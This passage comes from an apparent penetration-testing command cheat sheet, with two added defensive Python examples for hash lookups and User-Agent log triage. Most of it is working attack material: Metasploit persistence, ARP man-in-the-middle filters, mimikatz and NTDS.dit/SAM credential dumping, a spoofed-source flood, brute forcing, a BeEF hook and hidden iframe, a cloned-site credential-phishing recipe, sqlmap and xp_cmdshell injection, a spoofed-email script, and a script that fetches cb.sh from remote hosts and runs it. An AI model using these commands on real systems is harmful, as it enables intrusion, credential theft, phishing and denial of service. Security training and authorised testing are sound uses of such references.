   ii.  #socks4 127.0.0.1 9050
   iii. socks4 127.0.0.1 1080
6. Save and close conf file
7. # proxychains nmap -sT -Pn -p80,135,445 3.3.3.3

RAILGUN - WINDOWS API CALLS TO POP A MESSAGE BOX
meterpreter > irb
>> client.railgun.user32.MessageBoxA(0,"got","you","MB_OK")
CREATE PERSISTENT WINDOWS SERVICE
msf > use post/windows/manage/persistence
msf > set LHOST <attack ip>
msf > set LPORT <callback port>
msf > set PAYLOAD_TYPE TCP|HTTP|HTTPS
msf > set REXENAME <filename>
msf > set SESSION <meterpreter session id>
msf > set STARTUP SERVICE

GATHER RECENTLY ACCESSED FILES AND WEB LINKS
meterpreter > run post/windows/gather/dumplinks

SPAWN NEW PROCESS AND TREE C:\
meterpreter > execute -H -f cmd.exe -a '/c tree /F /A c:\ > C:\temp\tree.txt'


ETTERCAP

MAN-IN-THE-MIDDLE WITH FILTER
ettercap.exe -I <iface> -M arp -Tq -F file.ef <MACs>/<IPs>/<Ports> <MACs>/<IPs>/<Ports>
# i.e.: //80,443 //  = any MAC, any IP, ports 80,443

MAN-IN-THE-MIDDLE ENTIRE SUBNET WITH APPLIED FILTER
# ettercap -T -M arp -F <filter> // //

SWITCH FLOOD
# ettercap -TP rand_flood

ETTERCAP FILTER

COMPILE ETTERCAP FILTER
# etterfilter filter.filter -o out.ef

SAMPLE FILTER - KILLS VPN TRAFFIC AND DECODES HTTP TRAFFIC
if (ip.proto == UDP && udp.dst == 500) {
    drop();
    kill();
}
if (ip.src == '<ip>') {
    if (tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding","Accept-Rubbish!");
            msg("Replaced Encoding\n");
        }
    }
}
MIMIKATZ
1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mimikatz
3. mimikatz# privilege::debug
4. mimikatz# inject::process lsass.exe sekurlsa.dll
5. mimikatz# @getLogonPasswords

HPING3

DOS FROM SPOOFED IPS
# hping3 <targetIP> --flood --frag --spoof <ip> --destport <#>

ARPING

ARP SCANNER
./arping -I eth# -a # arps
WINE

COMPILE EXE IN BACKTRACK
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o <file.exe> /tmp/<code.c>
wine <file.exe>

GRUB

CHANGE ROOT PASSWORD
GRUB Menu: Add 'single' to the end of the kernel line. Reboot. Change root pass. Reboot.

HYDRA

ONLINE BRUTE FORCE
# hydra -l ftp -P words -v <targetIP> ftp


JOHN THE RIPPER

CRACKING WITH A WORDLIST
$ ./john -wordfile:pw.lst -format:<format> hash.txt

FORMAT EXAMPLES
$ john --format=des username:SDbsugeBiC58A
$ john --format=lm username:$LM$a9c604d244c4e99d
$ john --format=md5 $1$12345678$alcc?83HRDBo6uxlbVx7D1
$ john --format=raw-sha1 A9993E364706816ABA3E25717850C26C9CD0D89D

# For --format=netlmv2 replace $NETLM with $NETLMv2
$ john --format=netlm username:$NETLM$1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC731BB25

# Exactly 36 spaces between USER and HASH (SAPB and SAPG)
$ john --format=sapb username:ROOT                                    $8366A4E9E6B72CB0
$ john --format=sapg username:ROOT                                    $1194E38F14B9F3F8DA1B151F14DEB70E7BDCC239

$ john --format=sha1-gen username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
$ john --format=zip username:$zip$*0*1*8005b1b7d077708d*dee4


PASSWORD WORDLIST

GENERATE WORDLIST BASED OFF SINGLE WORD
# Add lower (@), upper (,), number (%), and symbol (^) to the end of the word
# crunch 12 12 -t baseword@,%^ -o wordlist.txt

# Use custom special character set and add 2 numbers then special character
# maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?1 -o wordlist.txt
VSSOWN [2]

1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copy
   a. cscript vssown.vbs /start (optional)
   b. cscript vssown.vbs /create
3. Pull the following files from a shadow copy:
   a. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit
   b. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM
   c. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM
4. Copy files to attack box.
5. Download tools: http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
6. Configure and make source code for libesedb from the extracted package
   a. cd libesedb
   b. chmod +x configure
   c. ./configure && make
7. Use esedbdumphash to extract the datatable from ntds.dit.
   a. cd esedbtools
   b. ./esedbdumphash ../../ntds.dit
8a. Use dsdump.py to dump hashes from datatable using bootkey from SYSTEM hive
   a. cd ../../creddump/
   b. python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
8b. Use bkhive and samdump2 to dump hashes from SAM using bootkey from SYSTEM hive.
   a. bkhive SYSTEM key.txt
   b. samdump2 SAM key.txt
9. Dump historical hashes
   a. python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable
FILE HASHING

HASH LENGTHS
MD5       16 bytes
SHA-1     20 bytes
SHA-256   32 bytes
SHA-512   64 bytes

SOFTWARE HASH DATABASE
http://isc.sans.edu/tools/hashsearch.html
# dig +short <md5>.md5.dshield.org TXT
Result = "<filename> | <source>"   i.e. "cmd.exe | NIST"

MALWARE HASH DATABASE
http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = <last seen timestamp> <AV detection rate>
Convert timestamp = perl -e 'print scalar localtime(<timestamp>), "\n"'

FILE METADATA SEARCH
https://fileadvisor.bit9.com/services/search.aspx

SEARCH VIRUSTOTAL DATABASE
https://www.virustotal.com/#search
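The hash-length table and the two DNS lookups above, worked through in Python 3 as an added example (not code from the book): identify a digest by its length, build the dshield and Team Cymru query names, and turn the registry's epoch timestamp into a date the way the perl one-liner does. The file content and the TXT answer are constructed; no DNS query is sent.

```python
import hashlib
import time

# Digest lengths from the HASH LENGTHS table (hex form is twice the byte count)
DIGEST_BYTES = {"md5": 16, "sha1": 20, "sha256": 32, "sha512": 64}


def digests(data):
    """Compute all four digests of a byte string as lowercase hex."""
    return {name: hashlib.new(name, data).hexdigest() for name in DIGEST_BYTES}


def guess_hash_type(hexdigest):
    """Name the algorithm by digest length alone; None for anything that is
    not a hex string of one of the four lengths above."""
    h = hexdigest.strip().lower()
    try:
        bytes.fromhex(h)
    except ValueError:
        return None
    for name, nbytes in DIGEST_BYTES.items():
        if len(h) == 2 * nbytes:
            return name
    return None


def dshield_query_name(md5hex):
    """DNS name to query (TXT) against the ISC/DShield software hash database."""
    if guess_hash_type(md5hex) != "md5":
        raise ValueError("dshield lookup takes an MD5")
    return "%s.md5.dshield.org" % md5hex.lower()


def cymru_query_name(hexdigest):
    """DNS name to query (TXT) against the Team Cymru malware hash registry,
    which accepts MD5 and SHA-1 only."""
    if guess_hash_type(hexdigest) not in ("md5", "sha1"):
        raise ValueError("cymru lookup takes an MD5 or SHA-1")
    return "%s.malware.hash.cymru.com" % hexdigest.lower()


def parse_cymru_answer(txt):
    """Split a TXT answer "<last seen epoch> <AV detection rate>" into
    (epoch, rate). Returns None for an empty answer, i.e. a hash the
    registry has never seen."""
    fields = txt.strip().strip('"').split()
    if len(fields) != 2:
        return None
    return int(fields[0]), int(fields[1])


def epoch_to_text(epoch):
    """The page's perl localtime() conversion, done in UTC so the result
    does not depend on the analyst's time zone."""
    return time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(epoch))


def describe_sample():
    """Run the helpers over constructed input (no network traffic)."""
    sample_file = b"abc"                       # constructed stand-in for a file
    d = digests(sample_file)
    answer = '"1279756800 53"'                 # constructed TXT answer in the registry's layout
    seen, rate = parse_cymru_answer(answer)
    return {
        "types": {guess_hash_type(v): v for v in d.values()},
        "dshield": dshield_query_name(d["md5"]),
        "cymru": cymru_query_name(d["sha1"]),
        "last_seen": epoch_to_text(seen),
        "detection_rate": rate,
    }


if __name__ == "__main__":
    for key, value in describe_sample().items():
        print(key, value)
```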
WEB

COMMON USER-AGENT STRINGS

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)                                         IE 6.0/WinXP 32-bit
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)                     IE 7.0/WinXP 32-bit
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible;        IE 8.0/WinVista 32-bit
  MSIE 6.0; Windows NT 5.1; SV1); .NET CLR 3.5.30729)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)                                 IE 9.0/Win7 32-bit
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)                          IE 9.0/Win7 64-bit
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0                          Firefox 5.0/Win7 64-bit
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1                             Firefox 13.0/WinXP 32-bit
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0                        Firefox 17.0/Win7 64-bit
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0                    Firefox 17.0/Linux
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:17.0) Gecko/20100101 Firefox/17.0               Firefox 17.0/MacOSX 10.7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:17.0) Gecko/20100101 Firefox/17.0               Firefox 17.0/MacOSX 10.8
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97         Chrome Generic/WinXP
  Safari/537.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97         Chrome Generic/Win7
  Safari/537.11
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97      Chrome Generic/Linux
  Safari/537.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko)           Chrome Generic/MacOSX
  Chrome/23.0.1271.101 Safari/537.11
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112   Chrome 13.0/Win7 64-bit
  Safari/535.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko)        Safari 6.0/MacOSX
  Version/6.0.2 Safari/536.26.17
Mozilla/5.0 (iPad; CPU OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)           Mobile Safari 6.0/iOS (iPad)
  Version/6.0 Mobile/10A523 Safari/8536.25
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)  Mobile Safari 6.0/iOS (iPhone)
  Version/6.0 Mobile/10A523 Safari/8536.25
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) AppleWebKit/533.1          Mobile Safari 4.0/Android
  (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
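The browser/platform column of the table above, turned into a small Python 3 classifier run over web-server log lines, as an added example (not code from the book). The log lines, addresses and the sqlmap client entry are constructed; the classification rules follow the table, and the point for a defender is the last function: clients whose User-Agent matches no browser family at all, remembering that the header is client-supplied and can be set to anything (the curl -A entry further down does exactly that).

```python
import re

# Constructed combined-log-format lines; addresses and requests are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2013:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"',
    '10.0.0.6 - - [10/Jan/2013:10:00:02 +0000] "GET /login.php HTTP/1.1" 200 812 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '10.0.0.7 - - [10/Jan/2013:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 100 "-" '
    '"Mozilla/5.0 (iPad; CPU OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) '
    'Version/6.0 Mobile/10A523 Safari/8536.25"',
    '10.0.0.8 - - [10/Jan/2013:10:00:04 +0000] "GET /?id=1 HTTP/1.1" 500 0 "-" '
    '"sqlmap/1.0-dev (http://sqlmap.org)"',
]

# client IP is the first field; the User-Agent is the last quoted field
LOG_RE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')
WINDOWS = {"5.0": "Win2000", "5.1": "WinXP", "6.0": "WinVista", "6.1": "Win7"}


def browser_of(ua):
    """Browser family and version following the table; 'unknown' otherwise."""
    m = re.search(r"MSIE (\d+\.\d+)", ua)        # IE8 nests an MSIE 6.0 token, first match wins
    if m:
        return "IE " + m.group(1)
    m = re.search(r"Firefox/(\d+\.\d+)", ua)
    if m:
        return "Firefox " + m.group(1)
    m = re.search(r"Chrome/(\d+\.\d+)", ua)      # Chrome also says Safari/, so test it first
    if m:
        return "Chrome " + m.group(1)
    m = re.search(r"Version/(\d+\.\d+).*Safari/", ua)
    if m:
        return ("Mobile Safari " if "Mobile" in ua else "Safari ") + m.group(1)
    return "unknown"


def platform_of(ua):
    """OS column of the table; WOW64 marks a 64-bit Windows build."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m:
        name = WINDOWS.get(m.group(1), "WinNT " + m.group(1))
        return name + (" 64-bit" if "WOW64" in ua else " 32-bit")
    if "iPad" in ua:
        return "iOS (iPad)"
    if "iPhone" in ua:
        return "iOS (iPhone)"
    if "Android" in ua:
        return "Android"
    m = re.search(r"Mac OS X (\d+[._]\d+)", ua)
    if m:
        return "MacOSX " + m.group(1).replace("_", ".")
    if "Linux" in ua:
        return "Linux"
    return "unknown"


def classify_ua(ua):
    return browser_of(ua), platform_of(ua)


def parse_log(lines):
    """(client_ip, user_agent, browser, platform) for each well-formed line."""
    rows = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ua = m.group(1), m.group(2)
        rows.append((ip, ua) + classify_ua(ua))
    return rows


def non_browser_clients(lines):
    """Clients whose User-Agent matches none of the browser families above.
    Scanners and scripts often announce themselves this way; a client that
    spoofs a browser string passes this check, so treat it as a triage hint."""
    return [(ip, ua) for ip, ua, browser, _ in parse_log(lines) if browser == "unknown"]


if __name__ == "__main__":
    for row in parse_log(SAMPLE_LOG):
        print(row)
    print("non-browser clients:", non_browser_clients(SAMPLE_LOG))
```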


HTML

HTML BEEF HOOK WITH EMBEDDED FRAME
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
<title>Campaign Title</title>
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + ':8080/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
//Site_refresh=window.setTimeout(function(){window.location.href='http://www.google.com/'},20000);
</script>
</head>
<frameset rows="*,1px">
<frame src="http://www.google.com/" frameborder=0 noresize="noresize" />
<frame src="/e" frameborder=0 scrolling=no noresize=noresize />
</frameset>
</html>

EMBEDDED JAVA APPLET (* PLACE WITHIN <BODY> TAG)
<applet archive="legit.jar" code="This is a legit applet" width="1" height="1"></applet>

EMBEDDED IFRAME
<iframe src="http://1.1.1.1" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden;display:none"></iframe>

FIREFOX TYPE CONVERSIONS
ASCII -> Base64    javascript:btoa("ascii str")
Base64 -> ASCII    javascript:atob("base64==")
ASCII -> URL       javascript:encodeURI("<script>")
URL -> ASCII       javascript:decodeURI("%3cscript%3E")

WGET

CAPTURE SESSION TOKEN
wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username=admin&password=pass&Login=Login" http://<url>/login.php
CURL

GRAB HEADERS AND SPOOF USER AGENT
curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" http://<ip>

SCRAPE SITE AFTER LOGIN
curl -u user:pass -o outfile https://login.bob.com

FTP
curl ftp://user:pass@bob.com/directory/

SEQUENTIAL LOOKUP
curl http://bob.com/file[1-10].txt


BASIC AUTHENTICATION USING APACHE2

The steps below will clone a website and redirect after 3 seconds to another page requiring basic authentication. It has proven very useful for collecting credentials during social engineering engagements.

1. Start Social Engineering Toolkit (SET)
   /pentest/exploits/set/./set
2. Through SET, use the 'Website Attack Vector' menu to clone your preferred website. * Do not close SET *
3. In a new terminal create a new directory (lowercase L)
   mkdir /var/www/l
4. Browse to SET directory and copy the cloned site
   cd /pentest/exploits/set/src/web_clone/site/template/
   cp index.html /var/www/index.html
   cp index.html /var/www/l/index.html
5. Open /var/www/index.html and add tag between <head> tags
   <meta http-equiv="refresh" content="3;url=http://<domain/ip>/l/index.html"/>
6. Create blank password file to be used for basic auth
   touch /etc/apache2/.htpasswd
7. Open /etc/apache2/sites-available/default and add:
   <Directory /var/www/l>
       AuthType Basic
       AuthName "PORTAL LOGIN BANNER"
       AuthUserFile /etc/apache2/.htpasswd
       Require user test
   </Directory>
8. Start Apache2
   /etc/init.d/apache2 start
9. Start Wireshark and add the filter:
   http.authbasic
10. Send the following link to your target users
   http://<domain/ip>/index.html
AUTOMATED WEB PAGE SCREENSHOTS

NMAP WEB PAGE SCREENSHOTS [9]

Install dependencies:
- wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
- tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
- cp wkhtmltoimage-i386 /usr/local/bin/

Install Nmap module:
- git clone git://github.com/SpiderLabs/Nmap-Tools.git
- cd Nmap-Tools/NSE/
- cp http-screenshot.nse /usr/local/share/nmap/scripts/
- nmap --script-updatedb

OS/version detection using screenshot script (screenshots saved as .png):
- nmap -A --script=http-screenshot -p80,443 1.1.1.0/24 -oA nmap-screengrab

Script will generate HTML preview page with all screenshots:
#!/bin/bash
printf "<HTML><BODY><BR>" > preview.html
ls -1 *.png | awk '{ print $1":<BR><IMG SRC=\""$1"\" width=400><BR><BR>"}' >> preview.html
printf "</BODY></HTML>" >> preview.html

PEEPINGTOM WEB PAGE SCREENSHOTS

Install Dependencies:
- Download PhantomJS
  https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
- Download PeepingTom
  git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git

Extract and copy phantomjs from phantomjs-1.9.2-linux-x86_64.tar.bz2 and copy to peepingtom directory

- Run PeepingTom
  python peepingtom.py http://<mytarget.com>


SQLMAP

GET REQUEST
./sqlmap.py -u "http://<url>?id=1&str=val"

POST REQUEST
./sqlmap.py -u "http://<url>" --data="id=1&str=val"

SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DB TYPE SPECIFIED
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --dbms="mssql|mysql|oracle|postgres"

SQL INJECTION ON AUTHENTICATED SITE
Login and note cookie value (cookie1=val1, cookie2=val2)
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"

SQL INJECTION AND COLLECT DB VERSION, NAME, AND USER
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL INJECTION AND GET TABLES OF DB=TESTDB
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --tables -D "testdb"

SQL INJECTION AND GET COLUMNS OF USER TABLE
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --columns -T "users"


DATABASES

MS-SQL
SELECT @@version                                                 DB version
EXEC xp_msver                                                    Detailed version info
EXEC master..xp_cmdshell 'net user'                              Run OS command
SELECT HOST_NAME()                                               Hostname & IP
SELECT DB_NAME()                                                 Current DB
SELECT name FROM master..sysdatabases;                           List DBs
SELECT user_name()                                               Current user
SELECT name FROM master..syslogins                               List users
SELECT name FROM master..sysobjects WHERE xtype='U';             List tables
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');   List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

LIST ALL TABLES/COLUMNS
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

PASSWORD HASHES (2005)
SELECT name, password_hash FROM master.sys.sql_logins

POSTGRES
SELECT version();                                                DB version
SELECT inet_server_addr()                                        Hostname & IP
SELECT current_database();                                       Current DB
SELECT datname FROM pg_database;                                 List DBs
SELECT user;                                                     Current user
SELECT usename FROM pg_user;                                     List users
SELECT usename, passwd FROM pg_shadow                            List password hashes

LIST COLUMNS
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

LIST TABLES
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

MYSQL
SELECT @@version;                                                DB version
SELECT @@hostname;                                               Hostname & IP
SELECT database();                                               Current DB
SELECT distinct(db) FROM mysql.db;                               List DBs
SELECT user();                                                   Current user
SELECT user FROM mysql.user;                                     List users
SELECT host, user, password FROM mysql.user;                     List password hashes

LIST ALL TABLES & COLUMNS
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

EXECUTE OS COMMAND THROUGH MYSQL
osql -S <ip>,<port> -U sa -P pwd -Q "exec xp_cmdshell 'net user /add user pass'"

READ WORLD-READABLE FILES
' UNION ALL SELECT LOAD_FILE('/etc/passwd');

WRITE TO FILE SYSTEM
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'

ORACLE
SELECT * FROM v$version;                                         DB version
SELECT version FROM v$instance;                                  DB version
SELECT instance_name FROM v$instance;                            Current DB
SELECT name FROM v$database;                                     Current DB
SELECT DISTINCT owner FROM all_tables;                           List DBs
SELECT user FROM dual;                                           Current user
SELECT username FROM all_users ORDER BY username;                List users
SELECT column_name FROM all_tab_columns;                         List columns
SELECT table_name FROM all_tables;                               List tables
SELECT name, password, astatus FROM sys.user$;                   List password hashes

LIST DBAS
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';


PROGRAMMING

PYTHON

PYTHON PORT SCANNER
import socket as sk
for port in range(1,1024):
    try:
        s=sk.socket(sk.AF_INET,sk.SOCK_STREAM)
        s.settimeout(1000)
        s.connect(('127.0.0.1',port))
        print '%d:OPEN' % (port)
        s.close()
    except: continue

PYTHON BASE64 WORDLIST
#!/usr/bin/python
import base64

file1=open("pwd.lst","r")
file2=open("b64pwds.lst","w")

for line in file1:
    clear = "administrator:" + str.strip(line)
    new = base64.encodestring(clear)
    file2.write(new)

CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii, sys, string

dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatHex:
    if char in string.printable: output += char
    else: output += "."
print "\n" + output

READ ALL FILES IN FOLDER AND SEARCH FOR REGEX
import glob, re
for msg in glob.glob('/tmp/*.txt'):
    filer = open((msg),'r')
    data = filer.read()
    message = re.findall(r'<message>(.*?)</message>', data, re.DOTALL)
    print "File %s contains %s" % (str(msg), message)
    filer.close()

SSL ENCRYPTED SIMPLEHTTPSERVER
# Create SSL cert (follow prompts for customization)
# openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes

# Create httpserver.py
import BaseHTTPServer, SimpleHTTPServer, ssl

cert = "cert.pem"

httpd = BaseHTTPServer.HTTPServer(('192.168.1.10', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
httpd.serve_forever()

PYTHON HTTP SERVER
python -m SimpleHTTPServer 8080

PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
import smtplib, string
import os, time

os.system("/etc/init.d/sendmail start")
time.sleep(4)

HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "target@you.com"
FROM = "spoof@spoof.com"
TEXT = "Message Body"

BODY = string.join((
    "From: %s" % FROM,
    "To: %s" % TO,
    "Subject: %s" % SUBJECT,
    "",
    TEXT
    ), "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit()

time.sleep(4)
os.system("/etc/init.d/sendmail stop")

LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os

urls = ["1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"

for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib2.urlopen(u)
        wfile = open("/tmp/cb.sh","wb")
        wfile.write(r.read())
        wfile.close()
        break
    except: continue

if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os.system("/tmp/cb.sh")

PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE, PORT, AND PACKET DELAY)
#!/usr/bin/python
import urllib2, sys, time

from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", dest="iprange", help="target IP range, i.e. 192.168.1.1-254")
parser.add_option("-p", dest="port", default="80", help="port, default=80")
parser.add_option("-d", dest="delay", default=".5", help="delay (in seconds), default=.5 seconds")

(opts, args) = parser.parse_args()

if opts.iprange is None:
    parser.error("you must supply an IP range")

ips = []
headers = {}

# range is given as a.b.c.start-stop; expand the last octet
octets = opts.iprange.split('.')
start = octets[3].split('-')[0]
stop = octets[3].split('-')[1]

for i in range(int(start),int(stop)+1):
    ips.append('%s.%s.%s.%d' % (octets[0],octets[1],octets[2],i))

print '\nScanning IPs: %s\n' % (ips)

for ip in ips:
    try:
        response = urllib2.urlopen('http://%s:%s' % (ip,opts.port))
        headers[ip] = dict(response.info())
    except Exception as e:
        headers[ip] = "Error: " + str(e)
    time.sleep(float(opts.delay))

for header in headers:
    try:
        print '%s : %s' % (header,headers[header].get('server'))
    except:
        print '%s : %s' % (header, headers[header])


SCAPY

* When you craft TCP packets with Scapy, the underlying OS will not recognize the initial SYN packet and will reply with a RST packet. To mitigate this you need to set the following iptables rule:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

from scapy.all import *                      Imports all scapy libraries
ls()                                         List all available protocols
lsc()                                        List all scapy functions
conf                                         Show/set scapy config
IP(src=RandIP())                             Generate random src IPs
Ether(src=RandMAC())                         Generate random src MACs
ip=IP(src="1.1.1.1",dst="2.2.2.2")           Specify IP parameters
tcp=TCP(dport=443)                           Specify TCP parameters
data="TCP data"                              Specify data portion
packet=ip/tcp/data                           Create IP()/TCP() packet
packet.show()                                Display packet configuration
send(packet,count=1)                         Send 1 packet @ layer 3
sendp(packet,count=2)                        Send 2 packets @ layer 2
sendpfast(packet)                            Send faster using tcpreplay
sr(packet)                                   Send 1 packet & get replies
sr1(packet)                                  Send only return 1st reply
for i in range(0,1000): send(<packet>)       Send <packet> 1000 times
sniff(count=100,iface="eth0")                Sniff 100 packets on eth0

SEND IPv6 ICMP MSG
sr(IPv6(src="<ipv6>", dst="<ipv6>")/ICMPv6EchoRequest())

UDP PACKET W/ SPECIFIC PAYLOAD:
ip=IP(src="<ip>", dst="<ip>")
u=UDP(dport=1234, sport=5678)
pay="my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap("out.pcap",packet)     # write to pcap
send(packet)

NTP FUZZER
packet=IP(src="<ip>", dst="<ip>")/UDP(dport=123)/fuzz(NTP(version=4, mode=4))

SEND HTTP MESSAGE
from scapy.all import *

# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data

fileweb = open("web.txt",'r')
data = fileweb.read()

ip = IP(dst="<ip>")
SYN = ip/TCP(sport=RandNum(6000,7000), dport=80, flags="S", seq=4)
SYNACK = sr1(SYN)
ACK = ip/TCP(sport=SYNACK.dport, dport=80, flags="A", seq=SYNACK.ack, ack=SYNACK.seq+1)/data
reply, error = sr(ACK)

print reply.show()
PERL

PERL PORT SCANNER
use strict; use IO::Socket;

for(my $port=0; $port<65535; $port++){
    my $remote=IO::Socket::INET->new(
        Proto=>"tcp", PeerAddr=>"127.0.0.1", PeerPort=>$port);
    if($remote){print "$port is open\n"};
}
REGEX EXPRESSIONS

^            Start of string
*            0 or more
+            1 or more
?            0 or 1
.            Any char but \n
{3}          Exactly 3
{3,}         3 or more
{3,5}        3, 4 or 5
(3|5)        3 or 5
[345]        3, 4 or 5
[^34]        Not 3 or 4
[a-z]        lowercase a-z
[A-Z]        uppercase A-Z
[0-9]        digit 0-9
\d           Digit
\D           Not digit
\w           A-Z,a-z,0-9
\W           Not A-Z,a-z,0-9
\s           White Space (\t\r\n\f)
\S           Not (\t\r\n\f)

reg[ex]      "rege" or "regx"
regex?       "rege" or "regex"
regex*       "rege" w/ 0 or more x
regex+       "rege" w/ 1 or more x
[Rr]egex     "Regex" or "regex"
\d{3}        Exactly 3 digits
\d{3,}       3 or more digits
[aeiou]      Any 1 vowel
(0[3-9]|1[0-9]|2[0-5])   Numbers 03-25
ASCII TABLE
(hex-to-character table; the columns did not survive the scan)
WIRELESS

FREQUENCY CHART
RFID                   120-150 kHz (LF)
